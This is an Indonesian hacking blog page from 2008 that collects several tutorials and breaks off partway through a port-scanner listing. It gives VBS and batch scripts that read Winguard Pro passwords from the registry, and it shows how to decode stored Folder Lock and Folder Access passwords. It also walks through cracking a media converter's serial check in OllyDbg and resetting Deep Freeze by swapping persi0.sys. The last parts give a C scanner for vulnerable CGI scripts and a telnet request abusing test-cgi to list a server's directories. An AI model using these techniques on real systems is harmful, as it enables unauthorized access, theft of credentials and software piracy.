Warung Bebas

Friday, October 17, 2008

Membuat Script untuk mengintip password Winguard Pro 2007

Selamat Pagi, Saudara sebangsa setanah air, senang sekali saya bisa berjumpa kembali dengan anda ( kok kayak MC ya ? )

Pada kesempatan kali ini saya ingin berbagi cara membuat script untuk mendapatkan password Winguard Pro terutama untuk versi 2007.

Seperti kita ketahui Winguard Pro adalah termasuk salah satu program populer di warnet-warnet so anak warnet - jangat lewatkan tutorial ini.

Kali ini saya ingin membagi dua macam script yang satu bat yang satu vbs, pokoknya semua kebagian deh ...(Hi hi hi kayak pembagian BLT aja)

OKe ...saya hentikan dulu basa-basinya.

Sekarang kita mulai dulu dengan script vbs :

Untuk mengintip password Winguard Pro dengan cepat, ketiklah tulisan di bawah ini dengan Notepad dan simpan dengan ekstensi vbs



' INTIP WINGUARD PRO 2007

Dim WinguardPro2007, Registri, BacaPassword_00, BacaPassword_01, BacaPassword_02



Set WinguardPro2007 = CreateObject("WScript.Shell")

Registri = "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management"

on error resume next

BacaPassword_00 = WinguardPro2007.RegRead(Registri & "title0")

BacaPassword_01 = WinguardPro2007.RegRead(Registri & "title1")

BacaPassword_02 = WinguardPro2007.regread(Registri & "title2")

WScript.echo "Intip Winguard Pro 2007 - by Eko.A"& vbcrlf &_

""& vbcrlf &_

"Password Enkripsi File : "& BacaPassword_00 & vbcrlf &_

"Password Konfigurasi : "& BacaPassword_01 & vbcrlf &_

"Password Program : "& BacaPassword_02


Bagi sampeyan yang lebih senang dengan script bat, ketik script dibawah ini dengan Notepad dan simpan dengan ekstensi bat.



@ECHO OFF

Title Intip Password Winguard Pro versi 2007

Echo.

Rem delims : TAB diikuti spasi

FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" /v title0') DO SET Pass_Enkrips=%%B

ECHO Password Enkripsi File = %Pass_Enkrips%

FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" /v title1') DO SET Pass_Konfig=%%B

ECHO Password Konfigurasi = %Pass_Konfig%

FOR /F "tokens=2* delims= " %%A IN ('REG QUERY "HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Management" /v title2') DO SET Pass_Aplik=%%B

ECHO Password Program = %Pass_Aplik%

Echo.

pause

exit

Cara Mudah Decrypt Password Folder Lock 5.8/5.9

pada kesempatan ini ingin berbagi cara mendekrip atau membaca isi password Folder Lock termasuk Folder Lock yang terbaru saat ini yaitu versi 5.9.

Cara mendekrip password FolderLock tidak terlalu sulit. Langkah-langkahnya adalah sebagai berikut :

Buka registry pada bagian :
HKEY_CURRENT_USERSoftwareMicrosoftWindowsQualityControl
_pack = "ini password tersandikan"

Anggap saja isi dari _pack = espxttbqfwpm~~~~

Pertama-tama : Abaikan tanda uler keket ~~~~ karena lambang itu tidak dibaca oleh file konfigurasinya.

Kemudian balik isi password yang terbaca di registry : espxttbqfwpm kalo dibalik akan menjadi
mpwfqbtt ...dan seterusnya.


Langkah selanjutnya mundurkan semua karakter masing-masing sebanyak satu karakter.
m diundurkan satu karakter menjadi l karena l letaknya satu karakter sebelum m
p diundurkan menjadi o
w menjadi v dan seterusnya

Sampai akhirnya terbacalah password aslinya yaitu :lovepassword.

Mudah sekali bukan membaca password FolderLock.

Cara Mudah Men-decrypt Folder Access

Folder Access adalah program pelindung folder gratis. Karena gratis itulah mungkin program ini jadi lumayan disukai. Program ini bisa panjenengan download di http://www.topdownloadsnet.com/.

Untuk mereset password Folder Access, caranya cukup mudah : kita hapus saja file mklf.dll seperti yang pernah dibahas oleh rekan saya di TopengDigital.
http://topengdigital.blogsome.com/2008/05/22/mereset-password-folder-access-200-free/

Tetapi pada saat ini kita tidak ingin mereset passwordnya – kita justru ingin tahu apa isi passwordnya.

Mungkin ada di antara teman-teman yang protes - kalau password bisa direset dengan mudah - mengapa pula kita harus tahu isi passwordnya. Jawaban terhadap pertanyaan semacam itu tentu bisa bermacam-macam. Ada yang karena iseng. Ada yang penasaran kepengin tahu apa sih sesungguhnya password lama yang kita lupakan.

Oaaaalah, ternyata itu to passwordnya....

Atau ada juga yang melakukan ini - sebagai semacam eksperimen untuk mendapatkan password aplikasi, password file atau account internet yang lain.

Kita tahu meskipun bangsa Indonesia atau kebanyakan manusia di dunia bukanlah seorang komunis. Tetapi dalam masalah membuat password, seringkali “budaya komunis” masih dipakai. Kebiasaan “komunis” yang sering kita pakai pakai adalah : satu untuk semua. Satu password untuk beragam aplikasi, file penting dan account internet. Alasan klasik yang sering dipakai adalah takut lupa password. Kebiasaan ini dilakukan oleh hampir semua orang - baik yang sebenarnya tahu bahayanya, apalagi bagi yang tidak tahu.

Karena ada cukup banyak manusia yang melakukan kebiasaan inilah - maka mendapatkan sebuah password apapun, kadangkala bisa lebih berharga ketimbang sekedar melewati proteksi atau by pass security. Karena ada kemungkinan password yang kita dapatkan, juga bisa dipakai untuk file penting, account internet atau aplikasi lain yang lebih berharga.

Baiklah, saya rasa sudah cukup pidatonya, toh 100 Tahun Kebangkitan Nasional juga sudah lewat cukup lama. He..he..he

Ok - untuk men-decrypt atau mendapatkan password dari Folder Access, caranya seperti ini :

Buka file mklf.dll yang terletak di folder system32 dengan Notepad atau Wordpad.
Anggap saja isi dari file mklf.dll yang terbaca adalah :

“ ‰šžŒŒˆ›

Kita ubah masing-masing karakter ASCII tersebut menjadi code decimalnya.
Cara paling gampang untuk mengubah sebuah karakter menjadi code decimal adalah dengan memakai fungsi dari program spreadsheet semacam Excel atau OpenOffice. Fungsi yang bisa kita pakai adalah = code(karakter). Silakan baca sendiri help untuk fungsi ini.

Baiklah anggap saja kita sudah berhasil melakukan itu. Kita sudah mendapatkan code decimal untuk masing-masing karakter.
Karakter “ codenya adalah 147
Karakter  codenya adalah 144
Karakter ‰ codenya adalah 137
Karakter š codenya adalah 154 ,dan seterusnya.

Untuk mendapatkan password aslinya, kita bisa memakai rumus seperti ini :

Password asli = 255 – password tersandikan. (perhitungan dalam decimal)

255 dikurangi 147 = 108
255 dikurangi 144 = 111
255 dikurangi 137 = 118
255 dikurangi 154 = 101

Selanjutnya ubah semua code di atas menjadi karakter kembali. Cara paling mudah untuk melakukan ini adalah memakai fungsi char(code).

Char(108) = l
char(111) = o
char (118) =v
dan seterusnya.

Password Folder Access yang berhasil kita dapatkan adalah : “lovepassword”(tanpa tanda petik). Tinggal isikan saja password tersebut ke kotak passwordnya.

Bagaimana Cara Cracking md5 ciphered text ??

LOGIKA :
md5 ( message digest 5 ) ituh adalah enkripsi one way hash yang artinya adalah plain text (text asli) yang sudah ter enkripsi tidak mungkin dikembalikan kedalam bentuk semula.

md5 ituh sebanyak apapun plaintextnya pasti akan dibikin menjadi 32 karakter terenkripsi , makanya sering md5 dibikin buat checksum atau pengecekan keabsahan suatu file karena satu karakter saja pun berubah , maka hasil md5nya juga akan berubah , walaupun sudah ditemukan kolisinya beberapa tahun yang lalu.

contoh :
plaintext : malcoder
ciphertext : 8c6d8aed6dc647db4e98ded91049e998

plaintext : apapunlah
ciphertext : 15cdd0fd997178efc32991ea5a5008ea

plaintext : a
ciphertext : 0cc175b9c0f1b6a831c399e269772661

itu membuktikan pernyataan diatas mengenai teori one way hash . Lalu bagaimana ?? kok bisa dicrack ?? khan gak bisa di decrypt....

caranya :
harus mengetahui dulu cara2 cracking password salah satunya bruteforce dan dictionary...
nah lalu kenapa bisa dicrack ??
yah dia bakal ngelakuin hal yang sama yaitu mencoba setiap kombinasi untuk yang bruteforce , dan ngelihat kamus pada metode dictionary...

TAPI.... bedanya sebelum melakukan pencocokan ama yang pengen dicrack , mesin mengenkripsi dulu kombinasi atau word dalam wordlistnya dictionary menjadi md5 .. baru setelah itu di cocokkan... selama belum diketemukan kecocokan , maka cracking berlanjut , dan jika udah diketemukan kecocokan , maka dia akan melihat..
"YANG MD5 INI PUNYA PLAINTEXT YANG MANA SIH??" nah akhirnya diketemukan plaintextnya...

binun ??? hehehe... yaudah saya jelaskan...

misalnya :

md5 yang pengen kita crack : 4a8a08f09d37b73795649038408b5f33

trus si mesin misalnya pake cara bruteforce , trus dia bikin kombinasi semua kemungkinan yang ada dan di encrypt ke md5:

plaintext | Ciphertext
a 0cc175b9c0f1b6a831c399e269772661 {== gak cocok
b 92eb5ffee6ae2fec3ad71c777531578f {== gak cocok
c 4a8a08f09d37b73795649038408b5f33 {== COCOK

setelah diketemukan mana yang cocok , maka akan dicari nih yang cocok yang punya siapa ??
dan diketahui yang punya adalah plaintext "c" berarti md5 yang pengen kita crack tadi text aslinya adalah "c"

CRACKED ... tugas selesaiii..

mudah2an bisa dimengerti...

Cracking Cool Media to Mp3 Wav Converter 3.01

Intro:
Udah lama banget aku ga bikin tuts lagi.. semua akibat kesibukan gw akhir2 ini yang menumpuk.. heheheh.. but..finally, aku membuat tuts lagi pada hari minggu 6 Juli 2008 yang cerah ini, diiringi lagu Wali-Dik…. J J
Tentang Target:
Cool Media to Mp3 Wav Converter is a powerful tool for converting Real Video files (*.ra; *.rm; *.rv;*.rmvb;*.rmj;*.rms;*.ram;*.rmm;*.rax;*.rvx;*.rp), Mpeg files (*.mpg; *.mpeg; *.mpa), Avi Files, Windows Media Files (*.wma; *.wmv; *.wm; *.asf; *.asx; *.wax; *.wvx; *.wmx), Midi files (*.mid; *.midi; *.rmi), Monkey's Audio files (*.ape) to Audio(*.MP3, *.WAV) format with CD quality.
Cool Media to Mp3 Wav Converter provides perfect sound quality and fast converting speed which saves your time greatly.
With Cool Media to Mp3 Wav Converter's handy intuitive interface and design, you'll find it very easy to use. Whatever you are, a professional or a beginner, you will feel cool media to mp3 wav converter is really developed for you!
Proteksi :
- Trial 3 kali pengunaan ç Hanya 3 kali.. buset deh...
- Serial Number

Tools :
1. PEID 0.94
2. Ollydbg v.1.10 (diabloo edition)
3 . Sedikit Logika yang kupikir kita semua memilikinya

Evaluasi Program :
Install Cool Media to Mp3 Wav Converter 3.01 pada PC anda.. (ya iya lah.. klo ga diinstall gmn bisa di krek, heheheh) kemudian jalankan.. anda akan melihat nag screen seperti ini :





(tampilan nag… saya telah menjalankan 2 kali sebelumnya)

Kalau di klik tombol register.. maka akan ada input nama dan serial, isikan saja sembarang, misalnya username: X-Bite dan reg kode: 1111111111111111…. Pencet OK









Wow kk wow… ternyata… username dan reg kodenya kagak bener kata neh sopwer…. Hmm yawdah.. diinget2 dah pesen errornya…

Cracking Target:
Sebelum menjalankan target pada ollydbg, mendingan kita cek dulu ne sopwer, pake packer ga (seandaynya pake.. kita musti kerja lebih keras, wkwkwkkw) jalan kan PEiD kita, kemudian open file MediaConverter.exe di lokasi “C:\Program Files\Media to mp3 wav converter\” itu jika kamu install pada default path looooo….. ^^
Hasilnya akan seperti gambar berikut ini..





(tampilan PEiD saat membuka file target)

Taaadaaaa… ternyata ne sopwer ga pake packer, jadi lebih santay deh.. ^^ dan lagian setelah cek pake plugin kripto analyzer ternyata.. ne sopwer jg ga ada pake kripto2an..

Oke… sekarang.. buka ollydbg, ataw kalo maw lebih mudah, setting ollydbg kita bikin ada di win explorer, caranya.. di optionnya olldbg, pilih add to explorer… kemudian “Add ollydbg to bla.. bla.. bla..” setelah itu tinggal klik kanan pada MediaConverter.exe (di win explorer) dan pilih Open with ollydebugger..


Nah, sekarang.. target telah dibuka dalam ollydbg… masih inget pesen error yang tadi? Lgsg aja klik kanan>>search for>> all referenced text string.. kemudian pada jendela baru yang muncul search for text… isi dengan “pair” lalu search.. akan muncul seperti ini

(tampilan all referenced text string setelah di search…)
Wah.. wah.. apa yang kita leat disitu??? Please input user name???? Please input registration code???? Kayaknya udah jelas.. kalaw kita udah mampir pada bagian registrasinya program ini deh.. lgsg aja deh ke alamat 40AE0A, yaitu alamat kalaw kita berhasil memasukan kode dengan benar…. Perhatikan call di 40ADE0.. hmm kayaknya neh call yang menentukan kalaw username dan reg code yang kita masukin valid apa nggak….(karena.. jump dibawahnya menuju ke Incorrect bla..bla..) Dah,, coba breakpoint aja disitu (f2) biar tahu kebenarannya.. lalu jalankan program (f9) pencet register.. isi lagi username dan reg codenya.. OK..

Eit.. tuh program beneran berhenti disitu.. hohoho.. lgsg aja step in dalam call tersebut (f7).. eh.. disitu ada sebuah call lagi di alamat 403F40 (yg telah saya coba beberapa kali, kalaw ne call memeriksa username kita), masuk lagi ke dalam call tersebut (f7)




Perhatikan baik2 perintah diatas…. Maksud perintah tersebut adalah mengkopi byte dari pointer DS:[EAX+1] ke register ECX, dimana pointer DS:[EAX=1] dpt kita lihat di kolom register sebelah kanan kalaw isi pointer EAX=’X-Bite’…. Jadi EAX+1 adalah karakter ‘-‘…. Kemudian dapat dilihat kalaw ECX dan EDX akan dibandingkan (CMP).. saat di compare EDX bernilai 44h dan ECX bernilai 2D…





ECX=2Dh=karakter ‘-‘ (karakter kedua dari X-Bite)
EDX=44h=karakter ????

Setelah saya bertanya pada dukun terdekat…. (tapi boong) ternyata 44h adalah karakter ‘D’ (sebenarnya gw cek pake program ASCII Table, huahuahuahauhau)




Karena pake user X-Bite ga bisa lewatin call yang satu itu.. saya lalu mencoba bagaimana kalaw saya ikutin aja maw tuh program… kita pakay karakter ‘D’ pada karakter username + 1 (karakter kedua), misalnya ADRIANO, EDUARDO, IDLE, dan laen-laen sebagaynya… dengan reg code 111111111111111111111…..

Dan ternyata.. lewat juga tuh call, ahahahhaha.. telusuri lagi satu persatu dengan menggunakan f8… sampay pada call 404004, saya melihat sesuatu yang mencurigakan..




1111-1111-0000-0000 <<< apa ini??? Saat saya melihat alamat 404005, isinya adalah 111111111111111 kita…hmmm apa ini serial nya?? Ga salah kah?? Coba deh gw input di reg code nya……
Username: ADRIANO
Reg Code: 1111-1111-0000-0000
Dan hasil nya????????





Well.. agak aneh.. masa seh serial nya gitu doank???? Males gw periksa lagi setelah gw coba buka beberapa kali ne program tetep aja udah full version, yg penting neh program udah kreked.. hahahah

Registered Version... Program is Cracked..

Mengatasi Lupa Password Deep Freeze 5 dan Lupa Password Deep Freeze 6

Hi Hi Hi...selamat siang saudara sebangsa maupun tidak sebangsa. Selamat berjumpa lagi dengan saya Lovepassword. Saya lagi masuk angin hari ini, dan kata sumber yang tidak bisa dipercaya saya harus banyak-banyak tertawa untuk membuang angin. Karena itulah saya terpaksa banyak tertawa hari ini. Hi Hi Hi.....- hi hi hi 13x.

Oke deh, saudara sebangsa maupun tidak sebangsa kita langsung saja masuk ke topik utama kita ya ? Yaitu cara mengatasi lupa password Deep Freeze 5 dan Deep Freeze 6.

Yak..1....2....3.....Mulai.

Deep Freeze adalah salah satu program "pengaman" yang paling populer di warnet. Program ini memang cukup powerfull dalam menghadapi virus maupun tingkah laku usil pengunjung warnet. Apapun perubahan yang dilakukan oleh virus maupun pengunjung akan dikembalikan seperti kondisi semula oleh DF.

Sayangnya karena terlena oleh kemudahan ini, beberapa admin warnet kadang jadi lupa dengan password DF, akibatnya admin kebingungan ketika hendak menginstall program baru karena program tersebut akan ditendang lagi oleg Deep Freeze.

Berikut ini salah satu cara untuk mereset password DeepFreeze yang sudah saya coba dengan DF 5 dan DF 6.

Untuk DF 5 :

1. Install Df di kompie lain yang tidak terproteksi dengan DF. Set passwordnya sesuka anda. Agar saat ini rekan-rekan dengan saya, kita anggap saja password barunya adalah "bakmi"(tanpa tanda kutip).

2.Untuk DF 5, password DF tersebut disimpan di file bernama Persi0.sys yang terletak di drive C

Cara mereset passwordnya logikanya lumayan gampang seh : Kita replace saja file persi0.sys lama yang passwordnya kita lupa dengan file persi0.sys baru yang tentu saja passwordnya kita tahu karena baru saja kita buat.

3. hanya saja sampe saat ini proses mereplace ini setahu saya ternyata nggak gampang-gampang amat karena belum ada yang bisa melakukan dalam normal windows. (Bagi rekan-rekan yang tahu caranya silakan memberi masukan ). File persi0.sys tidak mau ditindih dengan file persi0.sys baru dalam normal wondows karena terproteksi oleh DF yang sedang berjalan.

4. Karena file persi0.sys tidak bisa diganggu gugat dalam normal windows maka kita terpaksa mencari cara lain. Anda bisa mencoba memakai sistem operasi lain, sistem operasi portabel, dan sebagainya untuk mereplace file persi0.sys. Tetapi saya pribadi cukup puas dengan memakai Recovery Consol milik Windows XP Prof Edition.

5. Anggap saja kita memakai CD Windows XP Professional untuk masuk DOS versi XP(Recovery Console Windows XP). Restart komputer. Set BIOS untuk boot lewat CD. Tekan enter untuk masuk CD Windows. Tunggu sampai muncul tulisan Windows XP Professional Setup. Muncul 3 pilihan : To Setup Windows XP Now, press Enter ; To repair a Windows XP installation using Recovery Console, press R ; To quit setup without installing Windows XP, press F3. Pilih/tekan R (to repair) untuk masuk ke dalam Recovery Console.

6. Isikan password admin anda. Bila dulu saat anda menginstall, tidak memasang password, tinggal tekan enter. Muncul prompt : C:Windows>

7.Copi file Persi0.sys dengan nama lain. Karena file Persi0.sys menyimpan password Bakmi, maka pada contoh ini file persi0.sys saya copi menjadi Bakmi.sys.

C:Windows> cd c: ---- pindah direktori ke C:
C:>copy persi0.sys Bakmi.sys ---- copi persi0.sys dengan nama lain
C:>exit ---- keluar

8. Masuk windows normal, copikan file Bakmi.sys di komputer teman anda tersebut ke dalam CD atau USB.

9. Selanjutnya masuk komputer anda yang DeepFreeze-nya terpassword. Copikan file bakmi.sys yang sudah anda buat ke dalam drive yang tidak diproteksi oleh DeepFreeze. Bila drive C diproteksi oleh DeepFreeze maka jangan masukkan bakmi.sys ke drive C, karena file ini akan dihapus oleh DeepFreeze. Anggap saja kita kopikan bakmi.sys ke drive D. Windows Recovery Console seperti cara sebelumnya. Rename file persi0.sys dengan nama lain. Copikan file bakmi.sys di drive D menjadi persi0.sys di drive C.

C:Windows>cd c: ----- pindah direktori
C:>ren persi0.sys Cp_persi0.sys ----- rename persi0.sys dengan nama lain
C:>copy d:Bakmi.sys c:persi0.sys ----- copy file baru menjadi persi0.sys
C:>exit

10. Masuk Windows, Masuk program DeepFreeze(konfigurasi) : Tekan Ctrl+Shift pada keyboard sambil mengklik icon DeepFreeze di Taskbar. Muncul kotak password. Isikan dengan password yang baru saja anda buat yaitu : Bakmi. Anda sudah bisa masuk file konfigurasi, tanpa perlu menginstall ulang DeepFreeze.Tanpa perlu install ulang windows.

Catatan :

Bila anda melakukan cara yang lebih ekstrim, seperti menghapus/merename file persi0.sys tanpa menggantikannya dengan file lain maka ada resiko system menjadi tidak stabil atau icon DeepFreeze-nya malah hilang dari Taskbar.

Ide-ide di atas bisa anda coba, bila DeepFreeze anda mengalami kerusakan sehingga meskipun anda ingat passwordnya tetapi program DeepFreeze itu sendiri hilang lenyap tidak tampak di Taskbar dan tidak bisa dipanggil. Kemungkinan besar ada file yang corrupt, bisa jadi file tersebut adalah file persi0.sys. Coba lakukan cara yang sama.

Untuk Deep Freeze versi 6 :

Caranya persis sama dengan Deep Freeze versi 5. Hanya saja untuk versi tertentu namanya lain yaitu $persi0.sys. Jadi kalau untuk DF versi 5 yang harus anda replace adalah file persi0.sys untuk DF versi 6 file yang harus anda replace adalah $persi0.sys (ada tambahan tanda dollar di depan).

Lha cara mereplacenya tentunya suka-suka anda, mau pake Linux, mau pake DOS, pake sistem oparasi portabel ya terserah situlah. Pada contoh ini saya cukup memanfaatkan Recovery Consolnya XP saja, karena nggak merasa butuh program lain.

Oke saudara sebangsa setanah air maupun saudara yang tidak sebangsa dan tidak setanah air. Sekian sedikit sharing dari saya. Mohon maaf bila ada kekurangan.

Menjebol apache web server melalui test-cgi

Langsung saja, pertama yg perlu dipersiapkan oleh kita adalah scanner untuk melihat vulnerability dari web tersebut, disini saya sertakan juga source programnya, dalam C.




#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define RMT_PORT 80
#define OXO 1
#define LOOK "200 OK" /* ALL PROBLES HAVE A SOLUTION */
#define OUT_FILE "DOuiD.cgi" /* The out-put file with the result */

main(int argc, char *argv[])
{

struct sockaddr_in rmt_host;
struct hostent *rh;

FILE *f;
char buffer1[BUFSIZ];
char buffer2[BUFSIZ];
char *cgi[100]; /* You Can Change It Of Course */
char *name[100]; /* Here Also */

int sock,i=1;

memset(cgi,0,100);
memset(name,0,100);

memset(buffer1,0,BUFSIZ);
memset(buffer2,0,BUFSIZ);

/* THe CGI's List /cgi-bin/*.* */

cgi[1] = "GET /cgi-bin/phf SH \n\n";
cgi[2] = "GET /cgi-bin/test-cgi SH \n\n";
cgi[3] = "GET /cgi-bin/nph-test-cgi SH \n\n";
cgi[4] = "GET /cgi-bin/whois_raw.cgi SH \n\n";
cgi[5] = "GET /cgi-bin/Count.cgi SH \n\n";
cgi[6] = "GET /cgi-bin/search/tidfinder.cgi SH \n\n";
cgi[7] = "GET /cgi-bin/finger SH \n\n";
cgi[8] = "GET /cgi-bin/tablebuild.pl SH \n\n";
cgi[9] = "GET /cgi-bin/displayTC.pl SH \n\n";
cgi[10] = "GET /cgi-bin/uptime SH \n\n";
cgi[11] = "GET /cgi-bin/cvsweb/src/usr.bin/rdist/expand.c SH \n\n";
cgi[12] = "GET /cgi-bin/c_download.cgi SH \n\n";
cgi[13] = "GET /cgi-bin/program.pl SH \n\n";
cgi[14] = "GET /cgi-bin/ntitar.pl SH \n\n";
cgi[15] = "GET /cgi-bin/enter.cgi SH \n\n";
cgi[15] = "GET /cgi-bin/query_string.cgi SH \n\n";
cgi[16] = "GET /cgi-bin/AT-generate.cgi SH \n\n";
cgi[17] = "GET /cgi-bin/test.html SH \n\n";
cgi[18] = "GET /cgi-bin/test-unix.html SH \n\n";
cgi[19] = "GET /cgi-bin/printenv SH \n\n";
cgi[20] = "GET /cgi-bin/dasp/fm_shell.asp SH \n\n";
cgi[21] = "GET /cgi-bin/wa SH \n\n";
cgi[22] = "GET /cgi-bin/visadmin.exe SH \n\n";
cgi[23] = "GET /cgi-bin/wguest.exe SH \n\n";
cgi[24] = "GET /cgi-bin/rguest.exe SH \n\n";
cgi[25] = "GET /cgi-bin/AnyForm2 SH \n\n";
cgi[26] = "GET /cgi-dos/args.bat SH \n\n";
cgi[27] = "GET /cgi-bin/perlshop.cgi SH \n\n";
cgi[28] = "GET /cgi-bin/edit.pl SH \n\n";
cgi[29] = "GET /cgi-bin/guestbook.cgi SH \n\n";
cgi[30] = "GET /cgi-bin/cgiwrap SH \n\n";
cgi[31] = "GET /cgi-bin/wrap SH \n\n";
cgi[32] = "GET /cgi-bin/environ.cgi SH \n\n";
cgi[33] = "GET /cgi-bin/classifieds.cgi SH \n\n";
cgi[34] = "GET /cgi-bin/textcounter.pl SH \n\n";
cgi[35] = "GET /cgi-win/uploader.exe SH \n\n";
cgi[36] = "GET /cgi-bin/nph-publish SH \n\n";
cgi[37] = "GET /cgi-bin/handler SH \n\n";
cgi[38] = "GET /cgi-bin/faxsurvey SH \n\n";
cgi[39] = "GET /cgi-bin/php.cgi SH \n\n";
cgi[40] = "GET /cgi-bin/wwwboard.pl SH \n\n";
cgi[41] = "GET /cgi-bin/websendmail SH \n\n";
cgi[42] = "GET /cgi-bin/rwwwshell.pl SH \n\n";
cgi[43] = "GET /cgi-bin/campas SH \n\n";
cgi[44] = "GET /cgi-bin/webdist.cgi SH \n\n";
cgi[45] = "GET /cgi-bin/aglimpse SH \n\n";
cgi[46] = "GET /cgi-bin/man.sh SH \n\n";
cgi[47] = "GET /cgi-bin/info2www SH \n\n";
cgi[48] = "GET /cgi-bin/jj SH \n\n";
cgi[49] = "GET /cgi-bin/files.pl SH \n\n";
cgi[50] = "GET /cgi-bin/maillist.pl SH \n\n";
cgi[51] = "GET /cgi-bin/filemail.pl SH \n\n";
cgi[52] = "GET /cgi-bin/bnbform.cgi SH \n\n";
cgi[53] = "GET /cgi-bin/survey.cgi SH \n\n";
cgi[54] = "GET /cgi-bin/glimpse SH \n\n";
cgi[55] = "GET /cgi-bin/www-sql SH \n\n";

/* CGi Description */

name[1] = "phf ";
name[2] = "test-cgi ";
name[3] = "nph-test-cgi ";
name[4] = "whois_raw.cgi ";
name[5] = "Count.cgi ";
name[6] = "tidfinder.cgi ";
name[7] = "finger ";
name[8] = "tablebuild.pl ";
name[9] = "displayTC.pl ";
name[10] = "uptime ";
name[11] = "expand.c ";
name[12] = "c_download.cgi ";
name[13] = "program.pl ";
name[14] = "ntitar.pl ";
name[15] = "enter.cgi ";
name[16] = "query_tring.cgi ";
name[17] = "test.html ";
name[18] = "test-unix.html ";
name[19] = "printenv ";
name[20] = "fm_shell.asp ";
name[21] = "wa ";
name[22] = "visadmin.exe ";
name[23] = "wguest.exe ";
name[24] = "rguest.exe ";
name[25] = "AnyForm2 ";
name[26] = "args.bat ";
name[27] = "perlshop.cgi ";
name[28] = "edit.pl ";
name[29] = "guestbook ";
name[30] = "cgiwrap ";
name[31] = "wrap ";
name[32] = "environ.cgi ";
name[33] = "classifieds.cgi ";
name[34] = "textcounter.pl ";
name[35] = "uploader.exe ";
name[36] = "nph-publish ";
name[37] = "handler ";
name[38] = "faxsurvey ";
name[39] = "php.cgi ";
name[40] = "wwwboard.pl ";
name[41] = "websendmail ";
name[42] = "rwwwshwll ";
name[43] = "campas ";
name[44] = "webdist.cgi ";
name[45] = "aglimpse ";
name[46] = "man.sh ";
name[47] = "info2www ";
name[48] = "jj ";
name[49] = "files.pl ";
name[50] = "maillist.pl ";
name[51] = "filemail.pl ";
name[52] = "bnbform.cgi ";
name[53] = "survey.cgi ";
name[54] = "slinpse ";
name[55] = "www-sql ";

if ((f=fopen(OUT_FILE,"a"))==NULL){
perror("fopen");
exit(OXO);
}

if (argc != 2){
fprintf(stderr,"Usage: %s \ncgiS.c By ZinC_Sh(C).\n",argv[0]);
exit(OXO);
}

if ((rh=gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
exit(OXO);
}

printf("\t\t\t\b\b------------------------\n");
printf("\t\t\t\b\b|\033[6;35m CGi Scaner V1.0.1 .- \033[0m|\n");
printf("\t\t\t\b\b|\033[6;35m By Scorpionbugs(C).- \033[0m|\n");
printf("\t\t\t\b\b------------------------\n\n");

while (i < 55)
{
if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1){
perror("Socket");
exit(OXO);
}

bzero(&(rmt_host.sin_zero),8);
rmt_host.sin_family = AF_INET;
rmt_host.sin_addr = *((struct in_addr *)rh->h_addr);
rmt_host.sin_port = htons(RMT_PORT);

if (connect(sock,(struct sockaddr *) &rmt_host ,sizeof(rmt_host)) != 0){
perror("connect");
exit(OXO);
}

printf("LookinG For %s\b\b\b\bCGI in /cgi-bin/ :",name[i]);

send(sock,cgi[i],sizeof(cgi),0);
recv(sock,buffer1,sizeof(buffer1),0);

if((strstr(buffer1,LOOK)) != 0){
printf("\t\033[1;32mCGI FounD !!!\033[0m\n");
fputs("FounD !!!",f);
fputs(cgi[i],f);
} else {
printf("\tCGI NoT FounD.\n");
}

close(sock);
i++;
}

printf("\nKapUt !\nMay The Poula KApribekou Be With You... (ZinC_Sh).\n");
printf("The Results Will Be Found In THe DOuiD.cgi File.\n");

fclose(f);
return 0;
}


cara compile : gcc cgis.c -o cgis

kalo udah di compile trus sekarang waktunya hack dengan syntak

#cgis 10.1.xx.xx
looking for phf CGI in /cgi-bin/ : CGI Not Found
looking for test-cgi CGI in /cgi-bin/ : CGI Found !!!!
bla bla bla
bla bla
bla

dan hasil scannya disimpan di file DOuiD.cgi, di file ini sih cuma ngasih tahu aja hasil proses scan tersebut
nah dibaris kedua kita bisa lihat ternyata cgi-bin/test-cgi ada dan open dalam web tersebut

selanjutnya tinggal kita telnet ke 10.1.xx.xx melalui port 80

#telnet 10.1.xx.xx 80
Trying 10.1.xx.xx
Connected to 10.1.xx.xx Escape character is '^}'
GET /cgin-bin/test-cgi?/* report:argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root
/sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

nah di query_string kita bisa lihat seluruh directory selanjutnya terserah anda, saya menyarankan jangan mengubah atau menggangu
isi directory tersebut. selamat mencoba

Menjebol server melalui Service FTP

Menjebol server melalui FTP dengan menggunakan scanner cukup mudah. Pertama yang perlu disiapkan adalah scanner, saya menyertakannya sourcenya dalam C. Berikut adalah code yang hanya perlu anda compile dengan gcc -o.



#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define DEF_STR_PORT 1
#define DEF_STP_PORT 1024
#define OXO 1

struct sockaddr_in addr;
struct hostent *rh;
struct servent *rp;

int sock,i;
int str_ptr, stp_ptr;
int Usage(char *ARG);
int CONNECTION(int port);

int main(int argc, char *argv[])
{
if (argc != 4)
Usage(argv[0]);

str_ptr = atoi(argv[2]);
stp_ptr = atoi(argv[3]);
if (strcmp(argv[2],"-")==0 &&
strcmp(argv[3],"-")==0){
str_ptr = DEF_STR_PORT;
stp_ptr = DEF_STP_PORT;
}
if ( str_ptr > stp_ptr){
fprintf(stderr,"DetecT ErroR !!! On PortS,

Can't Be Greater
Than .-\n");
Usage(argv[0]);
exit(OXO);
}

if ((rh=gethostbyname(argv[1])) == NULL){
fprintf(stderr,"Can't Resolve Host %s
.-\n",argv[1]);
Usage(argv[0]);
exit(OXO);
}

printf("ScanninG Host %s From %d TcP Port To %d
.-\n",argv[1],str_ptr,stp_ptr);
